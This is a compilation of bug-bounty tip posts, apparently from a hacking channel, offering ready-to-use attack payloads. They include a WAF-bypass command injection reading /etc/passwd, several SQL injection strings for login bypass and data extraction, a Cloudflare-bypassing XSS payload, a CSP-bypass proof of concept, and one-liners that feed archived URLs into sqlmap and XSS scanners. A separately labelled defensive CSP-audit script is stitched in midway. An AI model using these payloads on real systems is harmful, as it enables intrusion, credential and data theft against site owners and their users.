Not only crawling: you can also do subdomain enumeration using Wayback.
curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Captcha (Google reCAPTCHA)
1. Try changing the request method, for example POST to GET
POST / HTTP/1.1
Host: target.com
...
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
#bugbounty #bypass
RCE WAF Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
#bugbounty #RCE #bypass
Payload Injector:
➕ Debinject:
😸 GitHub
➕ Pixload:
😸 GitHub
➕ Gospider:
😸 GitHub
#Injection #Hacking_Tool #BugBounty
BugCod3
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year: octagon.net
#BugBounty #bypass #POC
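A defender's check for the allow-list weakness described above, as an added example that is not part of the original post: it parses a Content-Security-Policy value and lists script-src host sources that belong to hosts known to serve JSONP-style callback endpoints. The function names and the JSONP_HOSTS list are assumptions for illustration; only microsoft.com comes from the post.

```javascript
// Added example: audit a CSP value for host allow-list entries that can be
// abused through JSONP-style endpoints (the weakness the post describes).
// JSONP_HOSTS is a constructed list; only microsoft.com comes from the post.
const JSONP_HOSTS = ["microsoft.com"];

// Parse a CSP header value into { directive: [sources...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // A repeated directive is ignored after its first occurrence.
    if (!(name in policy)) policy[name] = tokens.slice(1);
  }
  return policy;
}

// Reduce a host-source such as "https://*.microsoft.com:443/path" to its host.
function hostOf(source) {
  return source.toLowerCase()
    .replace(/^[a-z][a-z0-9+.-]*:\/\//, "")
    .replace(/[:/].*$/, "")
    .replace(/^\*\./, "");
}

// Return the script-src sources that need review (empty array = none found).
function auditScriptSrc(header) {
  const policy = parseCsp(header);
  // script-src falls back to default-src when absent.
  const sources = policy["script-src"] || policy["default-src"] || [];
  // With 'strict-dynamic', browsers ignore host allow-list entries.
  if (sources.some((s) => s.toLowerCase() === "'strict-dynamic'")) return [];
  return sources.filter((src) => {
    // Skip keywords, nonces, hashes and bare schemes such as "https:".
    if (src.startsWith("'") || /^[a-z][a-z0-9+.-]*:$/i.test(src)) return false;
    const host = hostOf(src);
    // Conservative: flag the listed host and any of its subdomains.
    return JSONP_HOSTS.some((h) => host === h || host.endsWith("." + h));
  });
}

// Constructed sample policies.
const weak = "default-src 'self'; script-src 'self' https://microsoft.com https://cdn.example";
const strict = "script-src 'nonce-r4nd0m' 'strict-dynamic' https://microsoft.com";
console.log(auditScriptSrc(weak), auditScriptSrc(strict));
```

Any source it returns is a candidate for replacing the host allow-list with nonces or hashes plus 'strict-dynamic'.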
Another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.
Payload
' or 1=1 -- -
bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay
#VPD #BugBounty #security
Cloudflare WAF bypass XSS
any payload they blocked by cloudflare
this payload working
"><img src=x onerrora=confirm() onerror=confirm(1)>
#Cloudflare #Bugbounty #Tip
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0 => FALSE
-1 OR 6=6 AND 0-0 => TRUE
Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0
#BugBounty #Tips #SQL
If you discover an Oracle web app, you can use this payload:
EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--
#BugBounty #Tips
One line for subdomain
for subdomain in $(subfinder -d tesla.com | dnsx | httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done
#BugBounty #Tips
bbscope
Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!
Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.
Reverse engineering god? No worries, you can get a list of binaries to analyze too :)
Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:
GO111MODULE=on go install github.com/sw33tLie/bbscope@latest
Usage:
bbscope (h1|bc|it|ywh|immunefi) -t <YOUR_TOKEN> <other-flags>
#GO #Grabber #Scope #BugBounty
Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS
BugCod3
#BugBounty #Nuclei #Templates
SQL Injection
After this, I used ghauri to extract the database. It was successful.
-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--
#SQL #Injection #ghauri #BugBounty #Tips
SQLMap from Waybackurls
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#Sqlmap #BugBounty #Tips
xss oneliner command
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
#XSS #BugBounty #Oneliner #Tips
Sql Injection
Payload :
-10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Parameter:
cart/-10+payload
#BugBounty #Tips #sql_injection
✅ Article introducing and exploiting 4 bugs:
1. path traversal
2. business logic
3. single sign-on (SSO) Misconfiguration
4. Insecure Deserialization
#Article
#Exploit #Xploit #Bugbounty
#Bug #SSRF #CSRF #SSO
Article introducing and exploiting 4 bugs.pdf
376.6 KB